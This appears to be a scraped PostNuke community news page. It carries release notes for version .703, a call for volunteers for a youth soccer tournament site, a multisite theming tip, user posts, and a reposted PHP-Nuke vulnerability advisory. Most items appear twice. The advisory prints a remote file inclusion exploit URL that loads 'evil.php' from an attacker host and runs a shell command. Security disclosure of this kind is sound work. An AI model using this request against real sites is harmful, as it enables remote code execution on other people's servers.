PostNuke
Flexible Content Management System
News
even Students use PostNuke
I used a slightly changed BLEUCHROME Theme and made some own Modules for Administration in our eCommunity.
Footnote: 1
PN .703 Release Notes
The release process has been changed for .71 and subsequent releases to ensure better quality, and less frustration for you and us.
In the meantime, these are the fixes and changes that were incorporated in .703:
CHANGES
- changed security.php to return an array (Jim McDonald)
- ran Generate Modules (Webmaster)
- added some of the missing translations (me)
- replaced pn64.php with a newer version (Jim McDonald)
- updated version number in default message (Soren Grauslund)
- applied the newest pnRedirect code (me)
- removed superfluous table from dl-adddownload (Anonymous)
- added missing eng directories (Steven Feather)
- Fixed redirects in Recommend Us (Eugenio Baldi)
- Fixed Registration login (Bob Brown)
- Fixed some & in Poll comments (me)
- Generically fixed & in redirects (whyzzi)
- added missing to login (Peter Nelson)
- added missing to permissions (Michael Jansen)
- Fixed automated news (Jan Schrage)
- Fixed file include vulnerability (Jim McDonald)
- Fixed permission string for web links (Fred B)
- Fixed in Recommend Us (Andy Varganov)
- Fixed Referers
- Fixed Downloads
- Fixed Links Admin
- Fixed Banners Admin
- Deployed CSRF Exploit Fix (Jim McDonald, adam_baum)
Enjoy!
In the meantime, these are the fixes and changes that were incorporated in .703:
CHANGES
- changed security.php to return an array (Jim McDonald)
- ran Generate Modules (Webmaster)
- added some of the missing translations (me)
- replaced pn64.php with a newer version (Jim McDonald)
- updated version number in default message (Soren Grauslund)
- applied the newest pnRedirect code (me)
- removed superfluous table from dl-adddownload (Anonymous)
- added missing eng directories (Steven Feather)
- Fixed redirects in Recommend Us (Eugenio Baldi)
- Fixed Registration login (Bob Brown)
- Fixed some & in Poll comments (me)
- Generically fixed & in redirects (whyzzi)
- added missing to login (Peter Nelson)
- added missing to permissions (Michael Jansen)
- Fixed automated news (Jan Schrage)
- Fixed file include vulnerability (Jim McDonald)
- Fixed permission string for web links (Fred B)
- Fixed in Recommend Us (Andy Varganov)
- Fixed Referers
- Fixed Downloads
- Fixed Links Admin
- Fixed Banners Admin
- Deployed CSRF Exploit Fix (Jim McDonald, adam_baum)
Enjoy!
PN Live
Our section here in Hawaii is hosting the AYSO (American Youth Soccer Organization) National Games this summer in Honolulu July 8-14.
We want to do everything we can to make this site as live a site as we can for the week so the 650,000+ kids and 180,000+ volunteers not attending can keep abreast of the tournament.
We want to post the scores of the 160 as or so games played everyday as soon as they are finished from the admin tent. We want to set up referee asignments on the site weeks or months in advance by allowing them to register & pick game assignments. We want to do what ever we or you can think of that can be done live and in advance of the tournament.
Some of the present modules will work great with minor changes but its going to require one or more new modules to do what we want to do.
We are asking for volunteers who want to help with this project in designing modules and to do a Hawaiian style soccer theme around our logo. You can contact me at billt@haii.net and we can talk about what we want to do.
Mahalo Bill
We want to do everything we can to make this site as live a site as we can for the week so the 650,000+ kids and 180,000+ volunteers not attending can keep abreast of the tournament.
We want to post the scores of the 160 as or so games played everyday as soon as they are finished from the admin tent. We want to set up referee asignments on the site weeks or months in advance by allowing them to register & pick game assignments. We want to do what ever we or you can think of that can be done live and in advance of the tournament.
Some of the present modules will work great with minor changes but its going to require one or more new modules to do what we want to do.
We are asking for volunteers who want to help with this project in designing modules and to do a Hawaiian style soccer theme around our logo. You can contact me at billt@haii.net and we can talk about what we want to do.
Mahalo Bill
Multisites
Just for your info if you are looking to multisite with themes for the different sites be sure to update all the links on the images for the themes. As stupid as it seems this one had me going for a litle while. They did mention in the doc.s about putting in the extra link for the logo.gif but not about the themes. So where your theme use to have a link like.
img src="themes/$thename/images/topleft.gif" border=0 width=622 height=109 alt=""
You should replace all image tages like this
img src="".WHERE_IS_PERSO."themes/$thename/images/topleft.gif" border=0 width=622 height=109 alt=""
There is also one minor adjustment to the whoisinc.php which made life a little easierYou have to add a . to the www servername ie.
$serverName = str_replace("www.","",$serverName);
So if your looking for help just contact me
Lee
lesmith@eurobell.co.uk
img src="themes/$thename/images/topleft.gif" border=0 width=622 height=109 alt=""
You should replace all image tages like this
img src="".WHERE_IS_PERSO."themes/$thename/images/topleft.gif" border=0 width=622 height=109 alt=""
There is also one minor adjustment to the whoisinc.php which made life a little easierYou have to add a . to the www servername ie.
$serverName = str_replace("www.","",$serverName);
So if your looking for help just contact me
Lee
lesmith@eurobell.co.uk
Question about the Offical Postnuke Sites
Is there a shared user database between all these sites? I personally do not think so, but why is there not one I better a question.
All the themes are different (which I do not mind) but the links are all different and they are not organized at all. I think in all the subdomains need some cleaning up when it comes to links, themes, and the usertables overall. Each one has its own sourceforge project and needs to be linked to that site.
I have to say I love PostNuke and the dev team, I am just shooting a question to the admins of the site.
All the themes are different (which I do not mind) but the links are all different and they are not organized at all. I think in all the subdomains need some cleaning up when it comes to links, themes, and the usertables overall. Each one has its own sourceforge project and needs to be linked to that site.
I have to say I love PostNuke and the dev team, I am just shooting a question to the admins of the site.
SkiWhere -- Another emerging POSTNUKE site.
This is a modularization of the original site:
http://www.SkiWhere.com with the goal of taking reviews for each ski resort. Of course we have bigger plans. We have a similar site at: http://www.ChurchZip.com
http://www.SkiWhere.com with the goal of taking reviews for each ski resort. Of course we have bigger plans. We have a similar site at: http://www.ChurchZip.com
Footnote: 1
Another PHP Nuke Bug
Subject: PHP-Nuke allows Command Execution & Much more
Hi All!
I've found a serious security flaw in PHP-Nuke.
It allows user to execute any PHP code.
The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering http://-urls
Remember the PHP's remote get feature...
How to exploit:
Upload this file to some free web space provider or
setup your own server:
Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
will execute ls -al command.
I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)
Vendor status:
I contacted the author on 28.12.2001 and he hasn't
replied.
Sincrely
"Nopman"
Hi All!
I've found a serious security flaw in PHP-Nuke.
It allows user to execute any PHP code.
The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering http://-urls
Remember the PHP's remote get feature...
How to exploit:
Upload this file to some free web space provider or
setup your own server:
Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
will execute ls -al command.
I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)
Vendor status:
I contacted the author on 28.12.2001 and he hasn't
replied.
Sincrely
"Nopman"
Page 128 / 277 (1271 - 1280 of 2763 Total)
